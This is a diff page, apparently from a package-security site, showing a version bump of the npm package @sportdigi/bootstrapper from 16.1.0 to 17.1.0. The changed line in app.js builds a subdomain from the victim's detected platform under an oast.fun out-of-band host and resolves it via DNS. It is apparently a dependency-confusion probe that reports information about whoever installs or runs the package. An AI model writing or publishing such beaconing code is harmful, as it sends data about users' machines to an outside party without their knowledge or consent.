@sportdigi/bootstrapper 16.1.0 → 17.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/app.js +1 -1
  2. package/package.json +1 -1
package/app.js CHANGED
@@ -25,7 +25,7 @@ switch (platform) {
25
25
  default: queryData = 'bilinmeyen'
26
26
  }
27
27
 
28
- const domain = `${platform}.nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun`;
28
+ const domain = `${queryData}.nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun`;
29
29
 
30
30
  dns.resolve(domain, (err, records) => {
31
31
  if (err) {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sportdigi/bootstrapper",
3
- "version": "16.1.0",
3
+ "version": "17.1.0",
4
4
  "description": "",
5
5
  "main": "app.js",
6
6
  "scripts": {